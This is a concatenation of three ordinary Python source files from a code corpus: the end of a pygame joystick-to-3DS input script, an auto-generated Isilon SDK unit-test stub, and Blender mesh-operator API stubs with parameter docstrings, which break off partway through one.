if event.axis == j_axis[0] :
if fabs(event.value)>deadZone:
server.circle_pad_coords[0] = int(32767*event.value) #left_joy_x
else:
#note: circle_pad_neutral() == circle_pad_coords = [0,0] (that is both X and Y coords are set to zero)
server.circle_pad_coords[0] = int(0) #left_joy_x
server.send()
if event.axis==j_axis[1] :
if fabs(event.value)>deadZone:
server.circle_pad_coords[1] = int(-32767*event.value) #left_joy_y
else:
server.circle_pad_coords[1] = int(0) #left_joy_y
server.send()
#using the right trigger to touch the screen only works if you have a right trigger and right thumbstick
if len(j_axis)>=6:
if (event.axis in [j_axis[2], j_axis[3],j_axis[5]]): #r trig = mouse click
(circx, circy)=(160+int(159*joystick.get_axis(j_axis[2])),120+int(119*joystick.get_axis(j_axis[3])))
#draw location of touch point but only when joystick moves
screen.blit(botSr, (0,0))
pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)
pygame.display.update()
if (joystick.get_axis(j_axis[5])>0.0): #Want to be able to "drag"
server.touch(circx,circy)
server.send()
pygame.draw.circle(screen, (255,255,255), (circx, circy), 3, 0)
pygame.display.update()
if event.axis == j_axis[5]: #r trig
if event.value < 0: #less than half depression #notme_irl
server.clear_touch()
server.send()
print("\nClearing everything and closing program")
server.clear_everything()
pygame.quit()
|
py | 1a30485ecd28afd50049a68d6a991861e5e272c5 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.drives_drive_firmware_node_drive import DrivesDriveFirmwareNodeDrive # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestDrivesDriveFirmwareNodeDrive(unittest.TestCase):
"""DrivesDriveFirmwareNodeDrive unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDrivesDriveFirmwareNodeDrive(self):
"""Test DrivesDriveFirmwareNodeDrive"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.drives_drive_firmware_node_drive.DrivesDriveFirmwareNodeDrive() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 1a3048e8e169005c6280a5415dd78b0a24347b37 | import sys
import typing
def average_normals(average_type: typing.Union[int, str] = 'CUSTOM_NORMAL',
weight: int = 50,
threshold: float = 0.01):
'''Average custom normals of selected vertices
:param average_type: Type, Averaging methodCUSTOM_NORMAL Custom Normal, Take Average of vert Normals.FACE_AREA Face Area, Set all vert normals by Face Area.CORNER_ANGLE Corner Angle, Set all vert normals by Corner Angle.
:type average_type: typing.Union[int, str]
:param weight: Weight, Weight applied per face
:type weight: int
:param threshold: Threshold, Threshold value for different weights to be considered equal
:type threshold: float
'''
pass
def beautify_fill(angle_limit: float = 3.14159):
'''Rearrange some faces to try to get less degenerated geometry
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
'''
pass
def bevel(offset_type: typing.Union[int, str] = 'OFFSET',
offset: float = 0.0,
offset_pct: float = 0.0,
segments: int = 1,
profile: float = 0.5,
vertex_only: bool = False,
clamp_overlap: bool = False,
loop_slide: bool = True,
mark_seam: bool = False,
mark_sharp: bool = False,
material: int = -1,
harden_normals: bool = False,
face_strength_mode: typing.Union[int, str] = 'NONE',
miter_outer: typing.Union[int, str] = 'SHARP',
miter_inner: typing.Union[int, str] = 'SHARP',
spread: float = 0.1,
release_confirm: bool = False):
'''Cut into selected items at an angle to create flat or rounded bevel or chamfer
:param offset_type: Width Type, What distance Width measuresOFFSET Offset, Amount is offset of new edges from original.WIDTH Width, Amount is width of new face.DEPTH Depth, Amount is perpendicular distance from original edge to bevel face.PERCENT Percent, Amount is percent of adjacent edge length.
:type offset_type: typing.Union[int, str]
:param offset: Width, Bevel amount
:type offset: float
:param offset_pct: Width Percent, Bevel amount for percentage method
:type offset_pct: float
:param segments: Segments, Segments for curved edge
:type segments: int
:param profile: Profile, Controls profile shape (0.5 = round)
:type profile: float
:param vertex_only: Vertex Only, Bevel only vertices
:type vertex_only: bool
:param clamp_overlap: Clamp Overlap, Do not allow beveled edges/vertices to overlap each other
:type clamp_overlap: bool
:param loop_slide: Loop Slide, Prefer slide along edge to even widths
:type loop_slide: bool
:param mark_seam: Mark Seams, Mark Seams along beveled edges
:type mark_seam: bool
:param mark_sharp: Mark Sharp, Mark beveled edges as sharp
:type mark_sharp: bool
:param material: Material, Material for bevel faces (-1 means use adjacent faces)
:type material: int
:param harden_normals: Harden Normals, Match normals of new faces to adjacent faces
:type harden_normals: bool
:param face_strength_mode: Face Strength Mode, Whether to set face strength, and which faces to set face strength onNONE None, Do not set face strength.NEW New, Set face strength on new faces only.AFFECTED Affected, Set face strength on new and modified faces only.ALL All, Set face strength on all faces.
:type face_strength_mode: typing.Union[int, str]
:param miter_outer: Outer Miter, Pattern to use for outside of mitersSHARP Sharp, Outside of miter is sharp.PATCH Patch, Outside of miter is squared-off patch.ARC Arc, Outside of miter is arc.
:type miter_outer: typing.Union[int, str]
:param miter_inner: Inner Miter, Pattern to use for inside of mitersSHARP Sharp, Inside of miter is sharp.ARC Arc, Inside of miter is arc.
:type miter_inner: typing.Union[int, str]
:param spread: Spread, Amount to spread arcs for arc inner miters
:type spread: float
:param release_confirm: Confirm on Release
:type release_confirm: bool
'''
pass
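# Hedged usage sketch (not part of the stub above): must be run inside Blender with
# the target mesh in Edit Mode and geometry selected; the values are illustrative only.
#
#   import bpy
#   bpy.ops.mesh.bevel(offset=0.05, segments=3, profile=0.5)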
def bisect(plane_co: float = (0.0, 0.0, 0.0),
plane_no: float = (0.0, 0.0, 0.0),
use_fill: bool = False,
clear_inner: bool = False,
clear_outer: bool = False,
threshold: float = 0.0001,
xstart: int = 0,
xend: int = 0,
ystart: int = 0,
yend: int = 0,
cursor: int = 5):
'''Cut geometry along a plane (click-drag to define plane)
:param plane_co: Plane Point, A point on the plane
:type plane_co: float
:param plane_no: Plane Normal, The direction the plane points
:type plane_no: float
:param use_fill: Fill, Fill in the cut
:type use_fill: bool
:param clear_inner: Clear Inner, Remove geometry behind the plane
:type clear_inner: bool
:param clear_outer: Clear Outer, Remove geometry in front of the plane
:type clear_outer: bool
:param threshold: Axis Threshold, Preserves the existing geometry along the cut plane
:type threshold: float
:param xstart: X Start
:type xstart: int
:param xend: X End
:type xend: int
:param ystart: Y Start
:type ystart: int
:param yend: Y End
:type yend: int
:param cursor: Cursor, Mouse cursor style to use during the modal operator
:type cursor: int
'''
pass
def blend_from_shape(shape: typing.Union[int, str] = '',
blend: float = 1.0,
add: bool = True):
'''Blend in shape from a shape key
:param shape: Shape, Shape key to use for blending
:type shape: typing.Union[int, str]
:param blend: Blend, Blending factor
:type blend: float
:param add: Add, Add rather than blend between shapes
:type add: bool
'''
pass
def bridge_edge_loops(type: typing.Union[int, str] = 'SINGLE',
use_merge: bool = False,
merge_factor: float = 0.5,
twist_offset: int = 0,
number_cuts: int = 0,
interpolation: typing.Union[int, str] = 'PATH',
smoothness: float = 1.0,
profile_shape_factor: float = 0.0,
profile_shape: typing.Union[int, str] = 'SMOOTH'):
'''Create a bridge of faces between two or more selected edge loops
:param type: Connect Loops, Method of bridging multiple loops
:type type: typing.Union[int, str]
:param use_merge: Merge, Merge rather than creating faces
:type use_merge: bool
:param merge_factor: Merge Factor
:type merge_factor: float
:param twist_offset: Twist, Twist offset for closed loops
:type twist_offset: int
:param number_cuts: Number of Cuts
:type number_cuts: int
:param interpolation: Interpolation, Interpolation method
:type interpolation: typing.Union[int, str]
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded
:type profile_shape_factor: float
:param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type profile_shape: typing.Union[int, str]
'''
pass
def colors_reverse():
'''Flip direction of vertex colors inside faces
'''
pass
def colors_rotate(use_ccw: bool = False):
'''Rotate vertex colors inside faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def convex_hull(delete_unused: bool = True,
use_existing_faces: bool = True,
make_holes: bool = False,
join_triangles: bool = True,
face_threshold: float = 0.698132,
shape_threshold: float = 0.698132,
uvs: bool = False,
vcols: bool = False,
seam: bool = False,
sharp: bool = False,
materials: bool = False):
'''Enclose selected vertices in a convex polyhedron
:param delete_unused: Delete Unused, Delete selected elements that are not used by the hull
:type delete_unused: bool
:param use_existing_faces: Use Existing Faces, Skip hull triangles that are covered by a pre-existing face
:type use_existing_faces: bool
:param make_holes: Make Holes, Delete selected faces that are used by the hull
:type make_holes: bool
:param join_triangles: Join Triangles, Merge adjacent triangles into quads
:type join_triangles: bool
:param face_threshold: Max Face Angle, Face angle limit
:type face_threshold: float
:param shape_threshold: Max Shape Angle, Shape angle limit
:type shape_threshold: float
:param uvs: Compare UVs
:type uvs: bool
:param vcols: Compare VCols
:type vcols: bool
:param seam: Compare Seam
:type seam: bool
:param sharp: Compare Sharp
:type sharp: bool
:param materials: Compare Materials
:type materials: bool
'''
pass
def customdata_custom_splitnormals_add():
'''Add a custom split normals layer, if none exists yet
'''
pass
def customdata_custom_splitnormals_clear():
'''Remove the custom split normals layer, if it exists
'''
pass
def customdata_mask_clear():
'''Clear vertex sculpt masking data from the mesh
'''
pass
def customdata_skin_add():
'''Add a vertex skin layer
'''
pass
def customdata_skin_clear():
'''Clear vertex skin layer
'''
pass
def decimate(ratio: float = 1.0,
use_vertex_group: bool = False,
vertex_group_factor: float = 1.0,
invert_vertex_group: bool = False,
use_symmetry: bool = False,
symmetry_axis: typing.Union[int, str] = 'Y'):
'''Simplify geometry by collapsing edges
:param ratio: Ratio
:type ratio: float
:param use_vertex_group: Vertex Group, Use active vertex group as an influence
:type use_vertex_group: bool
:param vertex_group_factor: Weight, Vertex group strength
:type vertex_group_factor: float
:param invert_vertex_group: Invert, Invert vertex group influence
:type invert_vertex_group: bool
:param use_symmetry: Symmetry, Maintain symmetry on an axis
:type use_symmetry: bool
:param symmetry_axis: Axis, Axis of symmetry
:type symmetry_axis: typing.Union[int, str]
'''
pass
def delete(type: typing.Union[int, str] = 'VERT'):
'''Delete selected vertices, edges or faces
:param type: Type, Method used for deleting mesh data
:type type: typing.Union[int, str]
'''
pass
def delete_edgeloop(use_face_split: bool = True):
'''Delete an edge loop by merging the faces on each side
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
'''
pass
def delete_loose(use_verts: bool = True,
use_edges: bool = True,
use_faces: bool = False):
'''Delete loose vertices, edges or faces
:param use_verts: Vertices, Remove loose vertices
:type use_verts: bool
:param use_edges: Edges, Remove loose edges
:type use_edges: bool
:param use_faces: Faces, Remove loose faces
:type use_faces: bool
'''
pass
def dissolve_degenerate(threshold: float = 0.0001):
'''Dissolve zero area faces and zero length edges
:param threshold: Merge Distance, Maximum distance between elements to merge
:type threshold: float
'''
pass
def dissolve_edges(use_verts: bool = True, use_face_split: bool = False):
'''Dissolve edges, merging faces
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
'''
pass
def dissolve_faces(use_verts: bool = False):
'''Dissolve faces
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
'''
pass
def dissolve_limited(angle_limit: float = 0.0872665,
use_dissolve_boundaries: bool = False,
delimit: typing.Set[typing.Union[int, str]] = {'NORMAL'}):
'''Dissolve selected edges and verts, limited by the angle of surrounding geometry
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
:param use_dissolve_boundaries: All Boundaries, Dissolve all vertices in between face boundaries
:type use_dissolve_boundaries: bool
:param delimit: Delimit, Delimit dissolve operationNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def dissolve_mode(use_verts: bool = False,
use_face_split: bool = False,
use_boundary_tear: bool = False):
'''Dissolve geometry based on the selection mode
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
:param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces
:type use_boundary_tear: bool
'''
pass
def dissolve_verts(use_face_split: bool = False,
use_boundary_tear: bool = False):
'''Dissolve verts, merge edges and faces
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
:param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces
:type use_boundary_tear: bool
'''
pass
def dupli_extrude_cursor(rotate_source: bool = True):
'''Duplicate and extrude selected vertices, edges or faces towards the mouse cursor
:param rotate_source: Rotate Source, Rotate initial selection giving better shape
:type rotate_source: bool
'''
pass
def duplicate(mode: int = 1):
'''Duplicate selected vertices, edges or faces
:param mode: Mode
:type mode: int
'''
pass
def duplicate_move(MESH_OT_duplicate=None, TRANSFORM_OT_translate=None):
'''Duplicate mesh and move
:param MESH_OT_duplicate: Duplicate, Duplicate selected vertices, edges or faces
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def edge_collapse():
'''Collapse selected edges
'''
pass
def edge_face_add():
'''Add an edge or face to selected
'''
pass
def edge_rotate(use_ccw: bool = False):
'''Rotate selected edge or adjoining faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def edge_split():
'''Split selected edges so that each neighbor face gets its own copy
'''
pass
def edgering_select(extend: bool = False,
deselect: bool = False,
toggle: bool = False,
ring: bool = True):
'''Select an edge ring
:param extend: Extend, Extend the selection
:type extend: bool
:param deselect: Deselect, Remove from the selection
:type deselect: bool
:param toggle: Toggle Select, Toggle the selection
:type toggle: bool
:param ring: Select Ring, Select ring
:type ring: bool
'''
pass
def edges_select_sharp(sharpness: float = 0.523599):
'''Select all sharp-enough edges
:param sharpness: Sharpness
:type sharpness: float
'''
pass
def extrude_context(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude selection
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_context_move(MESH_OT_extrude_context=None,
TRANSFORM_OT_translate=None):
'''Extrude region together along the average normal
:param MESH_OT_extrude_context: Extrude Context, Extrude selection
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_edges_indiv(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude individual edges only
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_edges_move(MESH_OT_extrude_edges_indiv=None,
TRANSFORM_OT_translate=None):
'''Extrude edges and move result
:param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_faces_indiv(mirror: bool = False):
'''Extrude individual faces only
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_faces_move(MESH_OT_extrude_faces_indiv=None,
TRANSFORM_OT_shrink_fatten=None):
'''Extrude each individual face separately along local normals
:param MESH_OT_extrude_faces_indiv: Extrude Individual Faces, Extrude individual faces only
:param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals
'''
pass
def extrude_region(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude region of faces
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_region_move(MESH_OT_extrude_region=None,
TRANSFORM_OT_translate=None):
'''Extrude region and move result
:param MESH_OT_extrude_region: Extrude Region, Extrude region of faces
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
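# Hedged usage sketch (run inside Blender, in Edit Mode, with faces selected); passing
# sub-operator settings as dicts is the usual pattern for macro operators, and the
# translation value below is illustrative only.
#
#   import bpy
#   bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value": (0.0, 0.0, 1.0)})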
def extrude_region_shrink_fatten(MESH_OT_extrude_region=None,
TRANSFORM_OT_shrink_fatten=None):
'''Extrude region together along local normals
:param MESH_OT_extrude_region: Extrude Region, Extrude region of faces
:param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals
'''
pass
def extrude_repeat(offset: float = 2.0, steps: int = 10):
'''Extrude selected vertices, edges or faces repeatedly
:param offset: Offset
:type offset: float
:param steps: Steps
:type steps: int
'''
pass
def extrude_vertices_move(MESH_OT_extrude_verts_indiv=None,
TRANSFORM_OT_translate=None):
'''Extrude vertices and move result
:param MESH_OT_extrude_verts_indiv: Extrude Only Vertices, Extrude individual vertices only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_verts_indiv(mirror: bool = False):
'''Extrude individual vertices only
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def face_make_planar(factor: float = 1.0, repeat: int = 1):
'''Flatten selected faces
:param factor: Factor
:type factor: float
:param repeat: Iterations
:type repeat: int
'''
pass
def face_split_by_edges():
'''Weld loose edges into faces (splitting them into new faces)
'''
pass
def faces_mirror_uv(direction: typing.Union[int, str] = 'POSITIVE',
precision: int = 3):
'''Copy mirror UV coordinates on the X axis based on a mirrored mesh
:param direction: Axis Direction
:type direction: typing.Union[int, str]
:param precision: Precision, Tolerance for finding vertex duplicates
:type precision: int
'''
pass
def faces_select_linked_flat(sharpness: float = 0.0174533):
'''Select linked faces by angle
:param sharpness: Sharpness
:type sharpness: float
'''
pass
def faces_shade_flat():
'''Display faces flat
'''
pass
def faces_shade_smooth():
'''Display faces smooth (using vertex normals)
'''
pass
def fill(use_beauty: bool = True):
'''Fill a selected edge loop with faces
:param use_beauty: Beauty, Use best triangulation division
:type use_beauty: bool
'''
pass
def fill_grid(span: int = 1, offset: int = 0, use_interp_simple: bool = False):
'''Fill grid from two loops
:param span: Span, Number of grid columns
:type span: int
:param offset: Offset, Vertex that is the corner of the grid
:type offset: int
:param use_interp_simple: Simple Blending, Use simple interpolation of grid vertices
:type use_interp_simple: bool
'''
pass
def fill_holes(sides: int = 4):
'''Fill in holes (boundary edge loops)
:param sides: Sides, Number of sides in hole required to fill (zero fills all holes)
:type sides: int
'''
pass
def flip_normals():
'''Flip the direction of selected faces’ normals (and of their vertices)
'''
pass
def hide(unselected: bool = False):
'''Hide (un)selected vertices, edges or faces
:param unselected: Unselected, Hide unselected rather than selected
:type unselected: bool
'''
pass
def inset(use_boundary: bool = True,
use_even_offset: bool = True,
use_relative_offset: bool = False,
use_edge_rail: bool = False,
thickness: float = 0.0,
depth: float = 0.0,
use_outset: bool = False,
use_select_inset: bool = False,
use_individual: bool = False,
use_interpolate: bool = True,
release_confirm: bool = False):
'''Inset new faces into selected faces
:param use_boundary: Boundary, Inset face boundaries
:type use_boundary: bool
:param use_even_offset: Offset Even, Scale the offset to give more even thickness
:type use_even_offset: bool
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param use_edge_rail: Edge Rail, Inset the region along existing edges
:type use_edge_rail: bool
:param thickness: Thickness
:type thickness: float
:param depth: Depth
:type depth: float
:param use_outset: Outset, Outset rather than inset
:type use_outset: bool
:param use_select_inset: Select Outer, Select the new inset faces
:type use_select_inset: bool
:param use_individual: Individual, Individual Face Inset
:type use_individual: bool
:param use_interpolate: Interpolate, Blend face data across the inset
:type use_interpolate: bool
:param release_confirm: Confirm on Release
:type release_confirm: bool
'''
pass
def intersect(mode: typing.Union[int, str] = 'SELECT_UNSELECT',
separate_mode: typing.Union[int, str] = 'CUT',
threshold: float = 1e-06):
'''Cut an intersection into faces
:param mode: SourceSELECT Self Intersect, Self intersect selected faces.SELECT_UNSELECT Selected/Unselected, Intersect selected with unselected faces.
:type mode: typing.Union[int, str]
:param separate_mode: Separate ModeALL All, Separate all geometry from intersections.CUT Cut, Cut into geometry keeping each side separate (Selected/Unselected only).NONE Merge, Merge all geometry from the intersection.
:type separate_mode: typing.Union[int, str]
:param threshold: Merge threshold
:type threshold: float
'''
pass
def intersect_boolean(operation: typing.Union[int, str] = 'DIFFERENCE',
use_swap: bool = False,
threshold: float = 1e-06):
'''Cut solid geometry from selected to unselected
:param operation: Boolean
:type operation: typing.Union[int, str]
:param use_swap: Swap, Use with difference intersection to swap which side is kept
:type use_swap: bool
:param threshold: Merge threshold
:type threshold: float
'''
pass
def knife_project(cut_through: bool = False):
'''Use other objects outlines & boundaries to project knife cuts
:param cut_through: Cut through, Cut through all faces, not just visible ones
:type cut_through: bool
'''
pass
def knife_tool(use_occlude_geometry: bool = True,
only_selected: bool = False,
wait_for_input: bool = True):
'''Cut new topology
:param use_occlude_geometry: Occlude Geometry, Only cut the front most geometry
:type use_occlude_geometry: bool
:param only_selected: Only Selected, Only cut selected geometry
:type only_selected: bool
:param wait_for_input: Wait for Input
:type wait_for_input: bool
'''
pass
def loop_multi_select(ring: bool = False):
'''Select a loop of connected edges by connection type
:param ring: Ring
:type ring: bool
'''
pass
def loop_select(extend: bool = False,
deselect: bool = False,
toggle: bool = False,
ring: bool = False):
'''Select a loop of connected edges
:param extend: Extend Select, Extend the selection
:type extend: bool
:param deselect: Deselect, Remove from the selection
:type deselect: bool
:param toggle: Toggle Select, Toggle the selection
:type toggle: bool
:param ring: Select Ring, Select ring
:type ring: bool
'''
pass
def loop_to_region(select_bigger: bool = False):
'''Select region of faces inside of a selected loop of edges
:param select_bigger: Select Bigger, Select bigger regions instead of smaller ones
:type select_bigger: bool
'''
pass
def loopcut(number_cuts: int = 1,
smoothness: float = 0.0,
falloff: typing.Union[int, str] = 'INVERSE_SQUARE',
object_index: int = -1,
edge_index: int = -1,
mesh_select_mode_init=(False, False, False)):
'''Add a new loop between existing loops
:param number_cuts: Number of Cuts
:type number_cuts: int
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param falloff: Falloff, Falloff type the featherSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type falloff: typing.Union[int, str]
:param object_index: Object Index
:type object_index: int
:param edge_index: Edge Index
:type edge_index: int
'''
pass
def loopcut_slide(MESH_OT_loopcut=None, TRANSFORM_OT_edge_slide=None):
'''Cut mesh loop and slide it
:param MESH_OT_loopcut: Loop Cut, Add a new loop between existing loops
:param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh
'''
pass
def mark_freestyle_edge(clear: bool = False):
'''(Un)mark selected edges as Freestyle feature edges
:param clear: Clear
:type clear: bool
'''
pass
def mark_freestyle_face(clear: bool = False):
'''(Un)mark selected faces for exclusion from Freestyle feature edge detection
:param clear: Clear
:type clear: bool
'''
pass
def mark_seam(clear: bool = False):
'''(Un)mark selected edges as a seam
:param clear: Clear
:type clear: bool
'''
pass
def mark_sharp(clear: bool = False, use_verts: bool = False):
'''(Un)mark selected edges as sharp
:param clear: Clear
:type clear: bool
:param use_verts: Vertices, Consider vertices instead of edges to select which edges to (un)tag as sharp
:type use_verts: bool
'''
pass
def merge(type: typing.Union[int, str] = 'CENTER', uvs: bool = False):
'''Merge selected vertices
:param type: Type, Merge method to use
:type type: typing.Union[int, str]
:param uvs: UVs, Move UVs according to merge
:type uvs: bool
'''
pass
def merge_normals():
'''Merge custom normals of selected vertices
'''
pass
def mod_weighted_strength(set: bool = False,
face_strength: typing.Union[int, str] = 'MEDIUM'):
'''Set/Get strength of face (used in Weighted Normal modifier)
:param set: Set value, Set Value of faces
:type set: bool
:param face_strength: Face Strength, Strength to use for assigning or selecting face influence for weighted normal modifier
:type face_strength: typing.Union[int, str]
'''
pass
def normals_make_consistent(inside: bool = False):
'''Make face and vertex normals point either outside or inside the mesh
:param inside: Inside
:type inside: bool
'''
pass
def normals_tools(mode: typing.Union[int, str] = 'COPY',
absolute: bool = False):
'''Custom normals tools using Normal Vector of UI
:param mode: Mode, Mode of tools taking input from InterfaceCOPY Copy Normal, Copy normal to buffer.PASTE Paste Normal, Paste normal from buffer.ADD Add Normal, Add normal vector with selection.MULTIPLY Multiply Normal, Multiply normal vector with selection.RESET Reset Normal, Reset buffer and/or normal of selected element.
:type mode: typing.Union[int, str]
:param absolute: Absolute Coordinates, Copy Absolute coordinates or Normal vector
:type absolute: bool
'''
pass
def offset_edge_loops(use_cap_endpoint: bool = False):
'''Create offset edge loop from the current selection
:param use_cap_endpoint: Cap Endpoint, Extend loop around end-points
:type use_cap_endpoint: bool
'''
pass
def offset_edge_loops_slide(MESH_OT_offset_edge_loops=None,
TRANSFORM_OT_edge_slide=None):
'''Offset edge loop slide
:param MESH_OT_offset_edge_loops: Offset Edge Loop, Create offset edge loop from the current selection
:param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh
'''
pass
def paint_mask_extract(mask_threshold: float = 0.5,
add_boundary_loop: bool = True,
smooth_iterations: int = 4,
apply_shrinkwrap: bool = True,
add_solidify: bool = True):
'''Create a new mesh object from the current paint mask
:param mask_threshold: Threshold, Minimum mask value to consider the vertex valid to extract a face from the original mesh
:type mask_threshold: float
:param add_boundary_loop: Add Boundary Loop, Add an extra edge loop to better preserve the shape when applying a subdivision surface modifier
:type add_boundary_loop: bool
:param smooth_iterations: Smooth Iterations, Smooth iterations applied to the extracted mesh
:type smooth_iterations: int
:param apply_shrinkwrap: Project to Sculpt, Project the extracted mesh into the original sculpt
:type apply_shrinkwrap: bool
:param add_solidify: Extract as Solid, Extract the mask as a solid object with a solidify modifier
:type add_solidify: bool
'''
pass
def point_normals(mode: typing.Union[int, str] = 'COORDINATES',
invert: bool = False,
align: bool = False,
target_location: float = (0.0, 0.0, 0.0),
spherize: bool = False,
spherize_strength: float = 0.1):
'''Point selected custom normals to specified Target
:param mode: Mode, How to define coordinates to point custom normals toCOORDINATES Coordinates, Use static coordinates (defined by various means).MOUSE Mouse, Follow mouse cursor.
:type mode: typing.Union[int, str]
:param invert: Invert, Invert affected normals
:type invert: bool
:param align: Align, Make all affected normals parallel
:type align: bool
:param target_location: Target, Target location to which normals will point
:type target_location: float
:param spherize: Spherize, Interpolate between original and new normals
:type spherize: bool
:param spherize_strength: Spherize Strength, Ratio of spherized normal to original normal
:type spherize_strength: float
'''
pass
def poke(offset: float = 0.0,
use_relative_offset: bool = False,
center_mode: typing.Union[int, str] = 'MEDIAN_WEIGHTED'):
'''Split a face into a fan
:param offset: Poke Offset, Poke Offset
:type offset: float
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param center_mode: Poke Center, Poke Face Center CalculationMEDIAN_WEIGHTED Weighted Median, Weighted median face center.MEDIAN Median, Median face center.BOUNDS Bounds, Face bounds center.
:type center_mode: typing.Union[int, str]
'''
pass
def polybuild_delete_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_dissolve_at_cursor():
'''Undocumented contribute <https://developer.blender.org/T51061>
'''
pass
def polybuild_extrude_at_cursor_move(
MESH_OT_polybuild_transform_at_cursor=None,
MESH_OT_extrude_edges_indiv=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor
:param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_face_at_cursor(
create_quads: bool = True,
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param create_quads: Create quads, Automatically split edges in triangles to maintain quad topology
:type create_quads: bool
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
